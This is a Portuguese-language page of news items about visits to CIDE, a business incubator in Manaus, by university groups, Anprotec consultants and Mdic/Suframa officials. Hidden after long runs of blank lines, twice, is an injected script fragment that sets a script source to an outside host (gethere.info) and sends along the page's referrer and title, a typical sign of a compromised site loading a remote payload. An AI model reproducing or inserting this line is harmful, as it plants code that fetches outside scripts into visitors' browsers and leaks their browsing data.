Universitário da fronteira: em busca de novas ideias

Antes de visitar às empresas, universitários conversam o diretor executivo do CIDE.
Antes de visitar às empresas, universitários conversam o diretor executivo do CIDE.

 

Uma turma de universitários do curso de Administração da Universidade Federal do Amazonas (UFAM) de Benjamin Constant, município a 1.120 Km de Manaus, sai por primeira vez da sua cidade para conhecer as empresas instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE), conversar com os empreendedores e entender o processo de administração de uma incubadora.

Para chegar ao CIDE, em Manaus, o grupo de acadêmicos teve de realizar vários pequenos eventos, como rifas e sorteios, para conseguir o dinheiro e comprar as passagens de ida e de volta. “Eu ouvi falar do CIDE em um evento internacional e me interessei por conhecer mais sobre essa instituição, e surgiu a oportunidade de trazer os estudantes com a finalidade de que eles possam desenvolver ideias empreendedoras e colocá-las em prática no seu município. Na verdade, o interior é carente de tudo e aceitamos o desafio de tomar iniciativas empreendedoras e inovadoras onde há carência e pobreza. É possível”, diz o professor Antônio Conceição, que nasceu em Manaus, mas trabalha em Benjamin Constant.

Segundo o grupo, a viagem até a capital durou quatro dias de barco. “O curso tem disciplinas de Empreendedorismo, Cooperativismo, Associativismo e essa visita faz parte de um projeto que queremos implantar na universidade, e esses alunos vão ser uma espécie de sementes para outros estudantes daquela cidade, de modo que possamos incentivá-los a tomar iniciativas, a tomar decisões e criar oportunidades de negócios ”, conta Conceição, dizendo também que, ao voltar, a turma vai realizar um pequeno evento para contar suas experiências na incubadora.

Contato Direto

A estudante de Administração, Taíza da Silva, veio com a delegação e conversou com os empreendedores.

“Lá, em Benjamin Constant, nós não temos contato com esse ambiente de fábricas e empresas. Então, a nossa finalidade aqui é ter um contato direto com os empreendimentos, conhecer a história dos empresários e ter novas ideias que possamos desenvolver dentro e fora da universidade”, diz Taíza.

Antes de visitar as empresas, os universitários ouviram uma palestra com o diretor executivo da incubadora, José Grosso, e foram divididos em grupos para falar pessoalmente com os empresários. “Para os estudantes do interior do Amazonas as coisas são mais difíceis. Mas fico muito feliz que eles já superaram a etapa de sair do seu local acadêmico para conhecer novos ambientes. Espero que sejam grandes empreendedores e possam ajudar outras pessoas, e desenvolvam as atividades comerciais em Benjamin Constant”, conclui Grosso.

Acadêmicos conhecem fábrica de temperos regionais.
Acadêmicos conhecem fábrica de temperos regionais.

 

 

Universitários registram sua primeira visita a uma incubadora de empresas.
Universitários registram sua primeira visita a uma incubadora de empresas.

 

 

Empresária do segmento de Doces Regionais conversa com os visitantes.
Empresária do segmento de Doces Regionais conversa com os visitantes.

 

 

No auditório do CIDE, universitários veem vídeo institucional.
No auditório do CIDE, universitários veem vídeo institucional.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Universidade faz do CIDE uma referência

Estudantes da Universidade do Texas na administração do CIDE.
Estudantes da Universidade do Texas na administração do CIDE.

 

Para os universitários que moram ou estudam em países como Estados Unidos, o mês de junho pode representar uma ótima oportunidade de conhecer novos lugares, ter novas experiências e complementar os estudos acadêmicos em outro país.

Visitando o Centro de Incubação e Desenvolvimento Empresarial (CIDE) por segunda vez, o curso de Engenharia de Alimentos da Texas A&M University, trouxe novos estudantes da área para conhecer o processo de produção das empresas instaladas, transformando a incubadora em um local de referência para os seus universitários.

Durante a visita, os acadêmicos norte-americanos tiveram a oportunidade de fazer a degustação de vários produtos regionais, o que impressionou o grupo.

Segundo a professora Susanne Talcott a Texas A&M University possui mais de duzentos programas de oportunidades para os estudantes. “A visita dos nossos acadêmicos de Nutrição ao CIDE é muito positiva porque eles conhecem pequenas empresas que fabricam grandes produtos deliciosos com matéria-prima da floresta. Isso é espetacular”, diz Talcott, acrescentando que sempre fica encantada com o Amazonas.

Antes de passar por Manaus, o grupo visitou universidades de Minas Gerais, São Paulo e Rio de Janeiro. “Normalmente, os estudantes norte-americanos não têm o costume de viajar para outros países em busca de conhecimentos. Então essa é uma oportunidade única para trocar experiências, aprendizados e conhecer coisas novas e diferentes”, finaliza a professora.

As empresas visitadas pelos alunos foram as do segmento de Alimentação, Panificação, Temperos e Doces. “Essa troca de experiências, conversa com empreendedores, funcionários, passagem pela produção, degustação de produtos regionais permitem a aproximação entre a universidade e as empresas. É bom, na etapa acadêmica, pelo menos na minha visão, pensar menos no cargo que você pode ocupar e mais nas experiências que você pode ter. Eles ainda são estudantes jovens e com as experiências e a qualificação serão grandes profissionais”, diz o diretor executivo do CIDE, José Grosso.

Universitários fazem degustação de produtos no CIDE.
Universitários fazem degustação de produtos no CIDE.

 

Estudantes ouvem palestra em fábrica de alimentos congelados.
Estudantes ouvem palestra em fábrica de alimentos congelados.

 

TEX3

 

TEX5

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Visita ajuda a compreender o conteúdo teórico

Visitantes de Roraima na administração do CIDE.
Visitantes de Roraima na administração do CIDE.

 

Estudantes do Mestrado Profissional em Propriedade Intelectual e Transferência de Tecnologia para a Inovação, conhecido como PROFNIT, da Universidade Federal de Roraima (UFRR), fizeram do Centro de Incubação e Desenvolvimento Empresarial (CIDE) o seu segundo ambiente de aula, conhecendo as instalações da incubadora, no mês de junho.

Os acadêmicos vieram à incubadora de empresas acompanhados de um grupo de pesquisadores do Instituto Nacional de Pesquisas na Amazônia (INPA) e conversaram com o diretor executivo da instituição. “Estudamos na sala de aula toda a parte teórica, mas fica faltando a prática. Então nessas visitas às instituições que fomentam a inovação, como o CIDE, conhecemos como funciona as empresas incubadas, que tipo de inovação elas produzem e como é feita a gestão. Portanto, sem esse contato com os empreendedores seria mais difícil interiorizarmos os conhecimentos do curso”, diz o mestrando Wilson Alves.

O PROFNIT consiste numa pós-graduação dedicada ao aprimoramento da formação profissional para atuar nas competências dos Núcleos de Inovação Tecnológica (NITs) e nos Ambientes Promotores de Inovação nos diversos setores acadêmicos, empresarial, governamental, organizações sociais, etc.

O curso veio a contribuir para o fortalecimento do relacionamento academia-empresa-governo e para a intensificação da transferência de conhecimentos para as empresas, ao preencher uma lacuna na qualificação do pessoal dos Núcleos de Inovação Tecnológica (NIT) e de profissionais ligados à transferência de tecnologia e inovação.

A Universidade Federal de Roraima (UFRR) é uma entre as 12 das instituições associadas nos quais o mestrado é oferecido.

Mestrandos da Universidade Federal de Roraima (UFRR) conversam com o diretor executivo do CIDE.
Mestrandos da Universidade Federal de Roraima (UFRR) conversam com o diretor executivo do CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

CIDE recebe visita técnica da Anprotec

Consultores da Anprotec conversam com o diretor executivo do CIDE e com a equipe administrativa
Consultores da Anprotec conversam com o diretor executivo do CIDE e com a equipe administrativa

 

 

Os consultores da Associação Nacional de Entidades Promotoras de Empreendimentos de Tecnologias Avançadas (Anprotec), Evelin Astolpho e Carlos Lamberti Júnior, estiveram no Centro de Incubação e Desenvolvimento Empresarial, no último dia 11, realizando a visita técnica do convênio de apoio às incubadoras, do edital Pró-Incubadoras da Fundação de Amparo à Pesquisa do Amazonas (Fapeam), além  de verificar o grau de implantação da metodologia CERNE no centro.

 

Conforme a representante da Anprotec, Evelin Astolpho, a visita serviu para verificar as atividades realizadas a favor dos empreendimentos instalados no CIDE. “O importante é comprovar que as ações que fazem parte do CERNE estão sendo realizadas e que os resultados estão sendo gerados, visando todo um desenvolvimento local da Região”, disse.

 

Para a coordenadora do projeto no CIDE, Rosália Padilha, a implantação do projeto traz melhorias para as empresas instaladas. “ O projeto utilizará a metodologia do Centro de Referência para Apoio a Novos Empreendimentos (CERNE) que é uma plataforma de soluções com qualificação, práticas e processos estabelecidos, e é válido para todas as incubadoras do Brasil, visando à melhoria em planejamentos, capacitação, empreendimentos, assessorias, consultorias, acompanhamento, etc. Desse modo, podemos ter empreendimentos de sucesso”, destaca.

 

O edital prevê visitas às incubadoras de empresas a cada seis meses. “Todo o trabalho é feito em parceria com a Fundação de Amparo à Pesquisa do Estado do Amazonas (Fapeam), portanto, a próxima visita acontecerá de acordo com o que estabelece o edital”, lembra Evelin Astolpho, acrescentando que outras incubadoras de Manaus e de outros municípios vão ser visitadas.

 

Uma vez terminada a avaliação, os consultores se dirigiram a algumas empresas para conhecer os trabalhos desenvolvidos, em companhia do diretor executivo do CIDE, José Grosso, da equipe administrativa e da coordenadora do “CIDE2”, Elizabeth Araújo.

O diretor executivo do CIDE, José Grosso, fala das ações implantadas
O diretor executivo do CIDE, José Grosso, fala das ações implantadas

 

 

A coordenadora do projeto no CIDE, Rosália Padilha, explica aos visitantes como funciona a incubadora
A coordenadora do projeto no CIDE, Rosália Padilha, explica aos visitantes como funciona a incubadora

 

 

Consultores da Anprotec conhecem os produtos regionais no CIDE
Consultores da Anprotec conhecem os produtos regionais no CIDE

 

 

Equipe visita a Cheiro D´Folha, no CIDE.
Equipe visita a Cheiro D´Folha, no CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Mdic convida empreendedores do CIDE para o PNCE

Durante a visita ao CIDE, representantes foram convidados a provar alguns produtos.
Durante a visita ao CIDE, representantes foram convidados a provar alguns produtos.

 

 

O Centro de Incubação e Desenvolvimento Empresarial (CIDE) é uma das instituições contempladas com a visita de representantes do Ministério do Desenvolvimento, Indústria e Comércio Exterior (Mdic) e da Superintendência da Zona Franca de Manaus (Suframa) que estiveram nesta quinta-feira, 25, na incubadora, para convidar os empreendedores a participar do Plano Nacional da Cultura Exportadora (PNCE).

Segundo o analista de comércio exterior, Rafael Codeço, o PNCE envolve setores de Alimentação e Bebidas, Cosméticos, Produtos Regionais, Indústria Naval, entre outros. “Nesse primeiro momento, trata-se de uma visita à diretoria do CIDE para convidar os empreendedores instalados na incubadora a participar da reunião, na qual explicaremos o programa e, por conseguinte, que eles participem do programa”, disse.

Ainda conforme Codeço, a reunião deve ser agendada para este primeiro semestre, na própria incubadora de empresas.

Para o diretor executivo do CIDE, José Barbosa Grosso, os empresários instalados na incubadora têm potencial para participar do programa do Mdic. “Temos ótimos empreendedores, com produtos competitivos e criativos. Portanto, penso eu, que não teremos dificuldades para participar do PNCE”, conclui.

Representantes do Mdic e da Suframa conversam com empresários no CIDE.
Representantes do Mdic e da Suframa conversam com empresários no CIDE.

 

 

O diretor executivo do CIDE, José Grosso, foi o encarregado de mostrar as instalações do CIDE.
O diretor executivo do CIDE, José Grosso, foi o encarregado de mostrar as instalações do CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;